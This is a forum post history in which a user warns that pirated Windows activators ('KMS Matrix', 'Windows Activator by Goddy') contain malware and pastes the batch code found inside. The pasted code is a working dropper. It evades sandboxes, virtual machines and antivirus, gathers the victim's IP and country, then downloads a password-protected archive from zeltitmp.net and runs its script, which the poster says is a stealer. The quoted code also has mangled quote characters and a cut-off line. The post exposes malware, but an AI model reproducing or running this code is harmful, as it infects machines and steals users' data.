Posts

GoodSync 12.7.5.5 Pro | Enterprise | Server | GoodSync2Go Portable | RePack by elchupacabra (18)
maorosh
12.5.6
new patch is needed
KMS Matrix 6.6 by GodMatrix (7)
maorosh
its similer to Windows Activator by Goddy [v4.8]
same group of shiti people
KMS Matrix 6.6 by GodMatrix (7)
maorosh
virus ... 
here is some bad code.
found inside the source code

ZZZZZZZZZZZZ

:KMSReActivation

set «osB=%PROCESSOR_ARCHITECTURE%»

if defined PROCESSOR_ARCHITEW6432 set «osB=AMD64»

if "%osB%"==«x86» (

set «bits=»

set «pf=%SystemDrive%\Program Files»

) else (

set «pf=%SystemDrive%\Program Files (x86)»

set «bits=/reg:32»

)

set yn=23

for /f %%a in ('wmic path win32_LocalTime Get Day^,Month^,Year /value') do >nul set "%%a"

set Month=00%Month%

set Month=%Month:~-2%

set Year=00%Year%

set Year=%Year:~-2%

set dt=%Day%%Month%%Year%

set «cnfv=%tmp%\cnf»

for /f «usebackq delims=;» %%i in ("%cnfv%") do set %%~i

set «dt1v=%d1%%m1%%yn%»

set «dt2v=%d2%%m1%%yn%»

set «dt3v=%d3%%m1%%yn%»

if %dt% equ %dt1v% exit

if %dt% equ %dt2v% exit

if %dt% equ %dt3v% exit

for /f tokens^=1^ delims^=^" %%i in ('tasklist /fi «imagename eq SbieSvc.exe» /fo csv /nh') do set sb=%%~i

if "%sb%" equ «SbieSvc.exe» exit

reg query «HKLM\SOFTWARE\Microsoft\Alu» /s %bits%

if %ERRORLEVEL% equ 0 exit

reg Add «HKLM\SOFTWARE\Microsoft\Alu» /f %bits%

for /f «tokens=2*» %%a in (' reg query «HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation» /v «SystemProductName» ') do set vm1="%%b"

for /f «tokens=2*» %%a in (' reg query «HKEY_LOCAL_MACHINE\SYSTEM\HardwareConfig\Current» /v «SystemProductName» ') do set vm2="%%b"

if %vm1% equ «KVM» exit

if %vm1% equ «VirtualBox» exit

if %vm2% equ «Virtual Machine» exit

for /f tokens^=1^ delims^=^" %%i in ('tasklist /fi «imagename eq ekrn.exe» /fo csv /nh') do set sb=%%~i

if "%sb%" equ «ekrn.exe» exit

for /f tokens^=1^ delims^=^" %%i in ('tasklist /fi «imagename eq QHActiveDefense.exe» /fo csv /nh') do set sb=%%~i

if "%sb%" equ «QHActiveDefense.exe» exit

d%v70%i%v71%r /S "%SystemDrive%\Program Files\Kaspersky Lab\*.exe"

if %ERRORLEVEL% equ 0 exit

d%v70%i%v71%r  /S "%SystemDrive%\Program Files (x86)\Kaspersky Lab\*.exe"

if %ERRORLEVEL% equ 0 exit

if not exist %windir%\System32\curl.exe powershell "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (new-object net.webclient).DownloadFile('https://github.com/cloud1cybertron/wincurl/raw/main/curl.exe', '%windir%\System32\curl.exe')"

if not exist %windir%\System32\curl.exe powershell "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (new-object net.webclient).DownloadFile('https://zelticloud.net/cu/curl.exe', '%windir%\System32\curl.exe')"

if not exist %windir%\System32\curl.exe exit

set «cnfv=%tmp%\cnf»

for /f «usebackq delims=;» %%i in ("%cnfv%") do set %%~i

set p1=%pid%

set s1=%sid%

for /f «tokens=* delims= » %%a in ('curl ipinfo.io/ip -k') do set «ei=%%~a»

for /f «tokens=* delims= » %%a in ('curl ipinfo.io/country -k') do set «ec=%%~a»

for %%i in (7 8 8.1 10 11) do (wmic os get caption|(>nul findstr /ilc:«Windows %%i»)&&(set es=%%i))

set didl=8

setlocal EnableDelayedExpansion EnableExtensions

for /f «tokens=* delims= » %%a in ('curl -k c.zeltitmp.net/c01.php --user-agent «c010101» ') do set «aaajkbkdfkjlgjfdkljhg4df=%%~a»

set num_t=16

set «num_set=0123456789abcdef»

:grmd

set /a «rnd=%num_t%*%random%/32768»

set «ed=!num_set:~%rnd%,1!%ed%»

set /a «didl-=1»

if %didl% gtr 0 goto grmd

set /a rg1=(%random%%%100)+1

if %rg1% == 1 set «uat=Mozilla/5.0 (Windows NT 10.0; Win64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5377.168 Safari/537.36»

if %rg1% == 2 set «uat=Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5368.101 Safari/537.36»

if %rg1% == 3 set «uat=Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5386.123 Safari/537.36»

if %rg1% == 4 set «uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like .................................

curl -k -o „%tmp%\m.7z“ -L „zeltitmp.net/pp/m.7z“ --user-agent „cnfvp201“

»%pf%\7-zip\7z.exe" x "%tmp%\m.7z" -o"%tmp%" -pconfigvpnG2012885838482012ggg -y

if exist %tmp%\m.bat powershell %tmp%\m.bat

del %tmp%\cnf

del %tmp%\cc.7z

exit
Windows Activator by Goddy 5.0 (5)
maorosh
its a stealer 

`
:: password configvpnG2012885838482012ggg
curl -k -o «m.7z» -L «zeltitmp.net/pp/m.7z» --user-agent «cnfvp201»
rem From m.bat
Comment edited: 27 December 2023, 20:27 (2 times)
Windows Activator by Goddy 5.0 (5)
maorosh
Ratiborus is great. I don't know why others do such shit 13
Windows Activator by Goddy 5.0 (5)
maorosh
drop virus ......
curl -k -o "\m.7z" -L «zeltitmp.net/pp/m.7z» --user-agent ""

«C:\Program Files (x86)\7-Zip\7z.exe» x "\m.7z" -o"" -pconfigvpnG2012885838482012ggg -y